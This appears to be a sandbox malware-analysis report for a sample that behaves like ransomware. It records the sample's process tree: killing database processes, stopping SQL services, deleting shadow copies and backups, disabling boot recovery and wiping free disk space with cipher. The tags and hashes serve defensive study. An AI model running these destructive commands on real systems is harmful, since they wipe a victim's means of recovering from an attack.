C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe2⤵PID:3356
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe3⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe2⤵PID:1836
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe3⤵PID:3640
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe2⤵PID:2848
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe3⤵PID:4608
-
C:\Windows\system32\taskkill.exetaskkill -f -impostgres.exe4⤵
- Kills process with taskkill
PID:1772
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper1002⤵PID:1832
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper1003⤵PID:1768
-
C:\Windows\system32\net.exenet stop MSSQLServerADHelper1004⤵PID:2080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1005⤵PID:428
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS2⤵PID:1660
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS3⤵PID:1856
-
C:\Windows\system32\net.exenet stop MSSQL$ISARS4⤵PID:2996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ISARS5⤵PID:2888
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW2⤵PID:4036
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW3⤵PID:1964
-
C:\Windows\system32\net.exenet stop MSSQL$MSFW4⤵PID:3792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$MSFW5⤵PID:912
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS2⤵PID:4872
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS3⤵PID:3824
-
C:\Windows\system32\net.exenet stop SQLAgent$ISARS4⤵PID:1436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ISARS5⤵PID:3184
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW2⤵PID:4836
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW3⤵PID:468
-
C:\Windows\system32\net.exenet stop SQLAgent$MSFW4⤵PID:4904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$MSFW5⤵PID:4812
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser2⤵PID:4528
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLBrowser3⤵PID:1868
-
C:\Windows\system32\net.exenet stop SQLBrowser4⤵PID:2452
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser5⤵PID:3640
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS2⤵PID:3780
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS3⤵PID:3340
-
C:\Windows\system32\net.exenet stop REportServer$ISARS4⤵PID:4424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop REportServer$ISARS5⤵PID:4912
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter2⤵PID:1888
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c net stop SQLWriter3⤵PID:2968
-
C:\Windows\system32\net.exenet stop SQLWriter4⤵PID:2080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter5⤵PID:4356
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet2⤵PID:4352
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet3⤵PID:2104
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:2416
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet2⤵PID:1832
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet3⤵PID:2056
-
C:\Windows\system32\wbadmin.exewbadmin delete backup -keepVersion:0 -quiet4⤵
- Deletes system backups
PID:464
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive2⤵PID:1608
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive3⤵PID:4492
-
C:\Windows\System32\Wbem\WMIC.exewmic.exe SHADOWCOPY /nointeractive4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3028
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵PID:3948
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵PID:1436
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:1180
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No2⤵PID:1872
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No3⤵PID:2652
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoverynabled No4⤵
- Modifies boot configuration data using bcdedit
PID:3448
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest2⤵PID:2364
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest3⤵PID:4304
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTABACKUP -deleteOldest4⤵PID:4812
-
-
-
-
C:\Windows\SysWOW64\cmd.exe\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP2⤵PID:1408
-
C:\Windows\system32\cmd.exeC:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP3⤵PID:1804
-
C:\Windows\system32\wbadmin.exewbadmin DELETE SYSTEMSTATEBACKUP4⤵
- Deletes System State backups
- Drops file in Windows directory
PID:4904
-
-
-
-
C:\Windows\SYSTEM32\cipher.execipher /w:\\?\A:2⤵
- Enumerates connected drives
PID:3320
-
-
C:\Windows\SYSTEM32\cipher.execipher /w:\\?\C:2⤵PID:1288
-
-
C:\Windows\SYSTEM32\cipher.execipher /w:\\?\F:2⤵
- Enumerates connected drives
PID:744
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3560
-
C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe\\?\C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe -network2⤵
- Adds Run key to start application
PID:3620
-
-
C:\Windows\system32\taskkill.exetaskkill -f -im msftesql.exe1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:940
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2284,i,2771196087253062161,8107167670425198948,262144 --variations-seed-version /prefetch:81⤵PID:1168
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Modifies Installed Components in the registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5300
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD5ead7a951b78c6557419477cb787ee0bf
SHA124a1b10601936d2c5cae3dc298723a9c62afd5fb
SHA256c1486b3cf916251a0d88b057c319c9f9b818709d9cb94dac462621337477e7c7
SHA51255186adae197adfcbc7ea8780ab3644b1397a2f7b84aec13f9d6a4b959a4dcb3b15c201ab04368337b8a686d3535508f74147897ecf552cecf2c46ac9a693ae8
-
C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.lock3
Filesize624KB
MD5efadff9f03e6460fb89bd64edc6c9102
SHA1ef56d96f27906ea5ea2899fd4d3b598a116944a9
SHA2560d5027990ba64e2f6bc287140161fddf44b1a6a0438b853bfeedb961869730d4
SHA512a6254282923ec4a0d898e0101b13fad16152fdb423fbf4847cbd9cf808513b888be18334c17833ef630aba19da67af620f75346e4fe7263eb1b6b5e1fc861e1e
-
C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms
Filesize513KB
MD50798686a3c416bba950611733bab0444
SHA1d373e14edf1bae7394593d624b821ed36fd4cb13
SHA2560e36a256bc2aaa6fb249d520e97140de69ddab102cfae1da5ea0cef2b337a35e
SHA512cb565fa5f24c4ee0edfb5c8d3b61db04993d727608362101b0985eed5098260eea4a4673780d3e04869a0dbeab110dd734a717e390ef1b26bd7c7715ffe142b7